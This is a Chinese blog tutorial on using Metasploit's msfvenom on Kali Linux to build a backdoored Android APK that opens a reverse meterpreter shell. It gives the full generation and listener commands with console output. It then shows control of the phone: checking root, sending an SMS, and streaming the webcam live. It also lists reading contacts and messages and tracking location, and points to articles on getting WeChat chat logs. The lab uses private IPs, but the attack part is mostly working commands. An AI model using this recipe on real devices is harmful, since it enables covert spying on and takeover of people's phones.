Kali之Metasploit生成apk后门控制安卓

深圳湾 2018-02-08

扫盲教程,大佬勿喷。

实验中请更改为你环境的IP。

生成apk后门

Kali Linux(Hack):192.168.169.76

Android(靶机):192.168.169.137

启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9486 bytes

lhost为kali的ip,lport指定一个端口。

开metasploit控制台侦听

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 #对应刚才设的端口
lport => 445
msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400

复制apk出来装到手机上打开后就可以exploit了,会看到会话反弹回来。

可以看下帮助都有啥操作

meterpreter > help

功能示例

读取联系人,信息,拍照,录音,获取位置信息,上传下载文件等等,还是挺强大的。

#系统信息
meterpreter > sysinfo 
Computer    : localhost
OS          : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)
Meterpreter : java/android

#查看root状态
meterpreter > check_root 
[+] Device is rooted

#发送短信
meterpreter > send_sms 
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."

OPTIONS:

    -d  <opt>  Destination number
    -dr        Wait for delivery report
    -h         Help Banner
    -t  <opt>  SMS body text


meterpreter > send_sms -d +8610086 -t "我是你爸爸"
[+] SMS sent - Transmission successful
meterpreter >
#网页视频聊天(我手机没合适浏览器没打开)
meterpreter > webcam_chat 
[*] Webcam chat session initialized.
[-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine


#网页摄像头视频流,显示实时画面
meterpreter > webcam_stream 
[*] Starting...
[*] Preparing player...
[*] Opening player at: lwqAtUFm.html
[*] Streaming...
Kali之Metasploit生成apk后门控制安卓Kali之Metasploit生成apk后门控制安卓Kali之Metasploit生成apk后门控制安卓

补充freebuf上的文章:

如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

相关推荐